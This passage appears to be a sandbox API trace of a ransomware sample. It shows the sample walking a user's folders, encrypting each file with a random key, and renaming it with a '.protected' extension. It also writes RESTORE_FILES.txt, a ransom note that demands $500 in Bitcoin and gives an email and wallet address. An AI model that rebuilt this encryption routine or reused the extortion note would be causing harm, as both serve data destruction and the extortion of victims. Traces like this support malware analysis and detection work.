lpBuffer=0x4a0460*, lpNumberOfBytesWritten=0x295e7b4*=0x1400, lpOverlapped=0x0) returned 1 [0077.792] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.792] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, 
lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0077.793] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0077.793] CloseHandle (hObject=0x150) returned 1 [0077.793] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\SharedDataEvents.protected") returned 93 [0077.793] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\SharedDataEvents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\shareddataevents"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\SharedDataEvents.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\shareddataevents.protected")) returned 1 [0077.794] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0077.794] lstrcmpiW (lpString1="UserCache.bin", lpString2="Windows") returned -1 [0077.794] lstrcmpiW (lpString1="UserCache.bin", lpString2="Program Files") returned 1 [0077.794] lstrcmpiW (lpString1="UserCache.bin", lpString2="Program Files (x86)") returned 1 [0077.794] lstrcmpiW (lpString1="UserCache.bin", lpString2="$Recycle.bin") returned 1 [0077.794] lstrcmpiW (lpString1="UserCache.bin", lpString2="System Volume Information") returned 1 [0077.794] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin") returned 80 [0077.794] StrStrIW (lpFirst="UserCache.bin", lpSrch=".protected") returned 0x0 [0077.794] lstrcmpW (lpString1="UserCache.bin", lpString2="RESTORE_FILES.txt") returned 1 [0077.794] 
CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0077.794] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0077.794] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\usercache.bin"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0077.795] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin") returned 80 [0077.795] StrStrW (lpFirst="UserCache.bin", lpSrch=".txt") returned 0x0 [0077.795] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin") returned 80 [0077.795] StrStrW (lpFirst="UserCache.bin", lpSrch=".rar") returned 0x0 [0077.795] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin") returned 80 [0077.795] StrStrW (lpFirst="UserCache.bin", lpSrch=".zip") returned 0x0 [0077.795] ReadFile (in: hFile=0x150, lpBuffer=0x4a0460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a0460*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0077.850] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.850] WriteFile (in: hFile=0x150, lpBuffer=0x4a0460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a0460*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0077.850] SetFilePointerEx (in: 
hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.851] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0077.851] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0077.852] CloseHandle (hObject=0x150) returned 1 [0077.852] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin.protected") returned 90 [0077.852] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\usercache.bin"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\usercache.bin.protected")) returned 1 [0077.853] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0077.853] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0077.853] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\RESTORE_FILES.txt") returned 84 [0077.853] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\restore_files.txt"), dwDesiredAccess=0x40000000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0077.853] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0077.853] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0077.854] lstrlenA (lpString="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") returned 684 [0077.854] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, 
nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0077.854] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0077.854] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0077.854] CloseHandle (hObject=0x14c) returned 1 [0077.855] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0077.855] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0077.855] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\RESTORE_FILES.txt") returned 79 [0077.855] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0077.855] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0077.855] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0077.856] lstrlenA (lpString="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") returned 684 [0077.856] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0077.856] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0077.856] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0077.856] CloseHandle (hObject=0xd8) returned 1 [0077.856] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0077.856] lstrcmpiW (lpString1="Color", lpString2="Windows") returned -1 [0077.856] lstrcmpiW (lpString1="Color", lpString2="Program Files") returned -1 [0077.856] lstrcmpiW (lpString1="Color", lpString2="Program Files (x86)") returned -1 [0077.856] lstrcmpiW (lpString1="Color", lpString2="$Recycle.bin") returned 1 [0077.856] lstrcmpiW (lpString1="Color", lpString2="System Volume Information") returned -1 [0077.856] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color") returned 59 [0077.856] lstrcmpW (lpString1="Color", lpString2=".") returned 1 [0077.856] lstrcmpW (lpString1="Color", lpString2="..") returned 1 [0077.857] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\*") returned 61 [0077.857] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0077.857] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0077.857] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0077.857] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0077.857] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0077.857] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0077.858] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\.") returned 61 [0077.858] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.858] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: 
lpFindFileData=0x295ea40) returned 1 [0077.858] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0077.858] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0077.858] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0077.858] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0077.858] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0077.858] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\..") returned 62 [0077.858] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.858] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.858] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0077.858] lstrcmpiW (lpString1="ACECache11.lst", lpString2="Windows") returned -1 [0077.858] lstrcmpiW (lpString1="ACECache11.lst", lpString2="Program Files") returned -1 [0077.858] lstrcmpiW (lpString1="ACECache11.lst", lpString2="Program Files (x86)") returned -1 [0077.858] lstrcmpiW (lpString1="ACECache11.lst", lpString2="$Recycle.bin") returned 1 [0077.858] lstrcmpiW (lpString1="ACECache11.lst", lpString2="System Volume Information") returned -1 [0077.858] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst") returned 74 [0077.858] StrStrIW (lpFirst="ACECache11.lst", lpSrch=".protected") returned 0x0 [0077.858] lstrcmpW (lpString1="ACECache11.lst", lpString2="RESTORE_FILES.txt") returned -1 [0077.858] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0077.858] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 
[0077.858] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\acecache11.lst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0077.858] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst") returned 74 [0077.858] StrStrW (lpFirst="ACECache11.lst", lpSrch=".txt") returned 0x0 [0077.858] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst") returned 74 [0077.859] StrStrW (lpFirst="ACECache11.lst", lpSrch=".rar") returned 0x0 [0077.859] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst") returned 74 [0077.859] StrStrW (lpFirst="ACECache11.lst", lpSrch=".zip") returned 0x0 [0077.859] ReadFile (in: hFile=0x14c, lpBuffer=0x49f458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesRead=0x295ea24*=0x49c, lpOverlapped=0x0) returned 1 [0077.880] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xfffffb64, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.880] WriteFile (in: hFile=0x14c, lpBuffer=0x49f458*, nNumberOfBytesToWrite=0x49c, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesWritten=0x295ea24*=0x49c, lpOverlapped=0x0) returned 1 [0077.881] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.882] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 
1 [0077.882] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0077.882] CloseHandle (hObject=0x14c) returned 1 [0077.882] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst.protected") returned 84 [0077.882] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\acecache11.lst"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\acecache11.lst.protected")) returned 1 [0077.883] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0077.885] lstrcmpiW (lpString1="Profiles", lpString2="Windows") returned -1 [0077.885] lstrcmpiW (lpString1="Profiles", lpString2="Program Files") returned -1 [0077.885] lstrcmpiW (lpString1="Profiles", lpString2="Program Files (x86)") returned -1 [0077.885] lstrcmpiW (lpString1="Profiles", lpString2="$Recycle.bin") returned 1 [0077.885] lstrcmpiW (lpString1="Profiles", lpString2="System Volume Information") returned -1 [0077.885] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles") returned 68 [0077.885] lstrcmpW (lpString1="Profiles", lpString2=".") returned 1 [0077.885] lstrcmpW (lpString1="Profiles", lpString2="..") returned 1 [0077.885] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\*") returned 70 
[0077.885] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0077.886] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0077.886] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0077.886] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0077.886] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0077.886] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0077.886] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\.") returned 70 [0077.886] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.886] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0077.886] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0077.886] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0077.886] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0077.886] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0077.886] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0077.886] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\..") returned 71 [0077.886] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.886] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.886] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0077.886] lstrcmpiW (lpString1="wscRGB.icc", lpString2="Windows") returned 1 [0077.886] lstrcmpiW (lpString1="wscRGB.icc", lpString2="Program Files") returned 1 [0077.886] lstrcmpiW (lpString1="wscRGB.icc", 
lpString2="Program Files (x86)") returned 1 [0077.886] lstrcmpiW (lpString1="wscRGB.icc", lpString2="$Recycle.bin") returned 1 [0077.886] lstrcmpiW (lpString1="wscRGB.icc", lpString2="System Volume Information") returned 1 [0077.886] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc") returned 79 [0077.886] StrStrIW (lpFirst="wscRGB.icc", lpSrch=".protected") returned 0x0 [0077.886] lstrcmpW (lpString1="wscRGB.icc", lpString2="RESTORE_FILES.txt") returned 1 [0077.886] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0077.887] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0077.887] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\profiles\\wscrgb.icc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0077.887] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc") returned 79 [0077.887] StrStrW (lpFirst="wscRGB.icc", lpSrch=".txt") returned 0x0 [0077.887] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc") returned 79 [0077.887] StrStrW (lpFirst="wscRGB.icc", lpSrch=".rar") returned 0x0 [0077.887] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc") returned 79 [0077.887] StrStrW (lpFirst="wscRGB.icc", lpSrch=".zip") returned 0x0 [0077.887] ReadFile (in: hFile=0x150, lpBuffer=0x49f458, nNumberOfBytesToRead=0x2800, 
lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0077.941] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.941] WriteFile (in: hFile=0x150, lpBuffer=0x49f458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0077.941] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.941] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0077.942] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0077.942] CloseHandle (hObject=0x150) returned 1 [0077.942] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc.protected") returned 89 [0077.942] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 